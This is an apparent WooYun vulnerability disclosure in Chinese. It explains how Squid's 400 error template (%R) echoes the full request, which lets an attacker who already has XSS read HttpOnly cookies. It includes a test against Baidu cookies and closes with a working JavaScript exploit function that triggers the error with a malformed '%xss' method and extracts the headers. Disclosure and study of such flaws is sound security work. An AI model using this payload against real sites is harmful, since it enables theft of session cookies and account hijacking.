WooYun.org

发现这个漏洞的缘起在于一次XSS...
成功插入代码以后发现目标cookie是HTTP-Only的...
按说，到这时候应当放弃了...但是啊...我们大学有个神奇的cache服务器叫做squid...
研究了一下....发现结合squid的错误机制是可以做到bypass http-only的
我们的目标错误是400: Bad Request
这个错误最容易通过浏览器Ajax触发（触发方式将在下面说明）
对应的错误模板文件为errors/en/ERR_INVALID_REQ
让我们打开看一下....虽说习惯很不好....居然只有一行....
不过重整一下还是很快找到了关键的部位

这个%R是什么意思呢
http://wiki.squid-cache.org/Features/CustomErrors#ERR_.2A_template_codes_for_embedding
看看这里
%R
Full HTTP Request
全部Request啊...那么意味着发出的cookie也可以方便的获取....不管是不是http-only的
试一下...
使用的网络是某大学的网络，squid版本为2.6/STABLE21
(有点老了，但是刚刚拖了最新的3.3.5版本下来看，这个问题没有被修过)

随便用一个网站，我用的是百度...这有俩httponly的cookie
然后构造畸形ajax请求

关键就在于那个%号
这会让squid认为这是一个不合法的request method从而抛出bad request
拿一下请求头

然后发现httponly的SSUDB和SSUDBTSP就这样拿到了
顺便吐槽一下百度，尼玛BDUSS和SSUDB是一样的内容你SSUDB是httponly的有毛意义
危害及局限：
1.XSS的大帮凶，httponly就这样轻轻松松bypass
2.主要适用于定点打击吧...不过写一小段脚本探测一下内网环境也是可以的
3.https协议下的请求因为不走cache服务器当然是拿不到的了
综上所述，自评10rank
最后送上一小段exploit

function getCookieOrHeader(){
var res= document.cookie;
//Test Squid
var r;
if(window.XMLHttpRequest) {
r = new XMLHttpRequest();
}
else {
try {
r = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e) {
r = new ActiveXObject("Microsoft.XMLHTTP");
}
}
r.open('%xss', '/', false);
r.send();
if(r.status == 400 && r.responseText.search("squid") != -1) {
var s = r.responseText.search(/<pre>/ig) + 6;
var l = r.responseText.search(/<\/pre>/ig) - s;
res = r.responseText.substr(s, l);
}
return res;
}